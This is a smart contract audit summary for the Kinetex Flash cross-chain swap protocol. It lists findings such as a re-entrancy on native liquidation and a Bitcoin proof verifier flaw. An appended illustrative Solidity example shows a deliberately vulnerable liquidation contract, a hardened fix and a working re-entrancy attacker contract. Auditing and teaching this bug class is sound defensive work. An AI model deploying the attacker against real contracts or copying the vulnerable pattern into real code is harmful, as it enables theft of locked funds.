This document presents the findings of a smart contract audit conducted by Côme du Crest for Gnosis.

Scope

A private repository was created specifically for this audit. The scope includes all contracts under flash-contracts-audit/contracts/ as of commit d77ae0e, excluding flash-contracts-audit/contracts/test/, which is expected to hold only mock contracts and other contracts useful for testing.

Context

The goal of Kinetex Flash is to enable swapping of assets across different blockchains.

ERC20 tokens are used extensively throughout the protocol. I assume that none of these tokens implements a blacklist or rebases balances; either behaviour would open vulnerabilities not covered by this report. I also assume the tokens are known and trusted ERC20 implementations that do not attempt re-entrancy attacks on the protocol.

Status

The report has been sent to the development team.

The development team wrote an audit response document, Kinetex-Audit-Response.

Fixes have been implemented in commit a683f4d of branch flash-contracts-audit/tree/fix-audit. All issues have been either fixed or acknowledged. Additionally, gas estimation contracts and functions have been added; they present no apparent vulnerability.

Issues

[High] Re-entrancy attack on native liquidation

[High] BitcoinProofVerifier wrongly assumes ASSET_NO_SEND_SIG is sent by order.fromActor

[Med] Misaligned incentives for Bitcoin send event report

[Info] Limited support for ERC1271

[Info] CollateralUnlocker._sendBalance() may run out of gas

[Info] Unfilled order sends collateral to order.fromActorReceiver which may be unexpected on collateral chain

[Info] Wormhole cross-chain payload send does not refund overpaid gas

[Info] ZetaChain onZetaRevert() is implemented in wrong contract

[Info] ZetaChain getZetaFromEth() can be sandwiched due to no slippage
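To illustrate the class of bug behind the first High finding (re-entrancy on a native-asset liquidation), the following is an added, purely illustrative example written for this summary; it is not Kinetex Flash code and does not reproduce the audited contracts. The contract names, the `liquidate()`/`deposit()` functions, the `orderId` keying and the `Reenter` attacker are all assumptions made for the example. It shows a payout that performs the native `call` before updating state, the attacker contract whose `receive()` re-enters it, and the hardened version that applies checks-effects-interactions plus a re-entrancy guard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative only: hypothetical liquidation that pays out native collateral
// keyed by an order id. Not the audited project's code.
contract VulnerableLiquidation {
    mapping(bytes32 => uint256) public collateral; // orderId => wei locked
    mapping(bytes32 => bool) public liquidated;

    function deposit(bytes32 orderId) external payable {
        collateral[orderId] += msg.value;
    }

    // Vulnerable: the external call runs before state is updated, so a receiver
    // that re-enters liquidate() passes the `!liquidated` check again and is paid
    // `amount` once more, draining collateral that belongs to other orders.
    function liquidate(bytes32 orderId, address payable to) external {
        require(!liquidated[orderId], "already liquidated");
        uint256 amount = collateral[orderId];
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "send failed");
        liquidated[orderId] = true;
        collateral[orderId] = 0;
    }
}

// Hardened version: state is zeroed before the native transfer (checks-effects-
// interactions) and a guard rejects any nested call into liquidate().
contract HardenedLiquidation {
    mapping(bytes32 => uint256) public collateral;
    mapping(bytes32 => bool) public liquidated;
    uint256 private _lock = 1; // 1 = unlocked, 2 = entered

    modifier nonReentrant() {
        require(_lock == 1, "reentrant call");
        _lock = 2;
        _;
        _lock = 1;
    }

    function deposit(bytes32 orderId) external payable {
        collateral[orderId] += msg.value;
    }

    function liquidate(bytes32 orderId, address payable to) external nonReentrant {
        require(!liquidated[orderId], "already liquidated");
        uint256 amount = collateral[orderId];
        liquidated[orderId] = true;   // effects first
        collateral[orderId] = 0;
        (bool ok, ) = to.call{value: amount}(""); // interaction last
        require(ok, "send failed");
    }
}

// Attacker whose receive() re-enters the vulnerable liquidate() while the
// original call is still mid-execution. Stops after a few rounds so the
// outer call does not revert on an empty target balance.
contract Reenter {
    VulnerableLiquidation public immutable target;
    bytes32 public immutable orderId;
    uint256 public hits;

    constructor(VulnerableLiquidation t, bytes32 id) {
        target = t;
        orderId = id;
    }

    receive() external payable {
        if (hits < 3 && address(target).balance >= msg.value) {
            hits++;
            target.liquidate(orderId, payable(address(this)));
        }
    }

    function attack() external {
        target.liquidate(orderId, payable(address(this)));
    }
}
```

Against `VulnerableLiquidation`, one `attack()` call collects the order's collateral four times (the outer call plus three nested ones); against `HardenedLiquidation` the same attacker's nested call reverts with "reentrant call", and even without the guard the re-entered call would read a zeroed `collateral[orderId]` and pay nothing. Deploy both targets with the same funded orders in a local test network to see the difference in the attacker's balance.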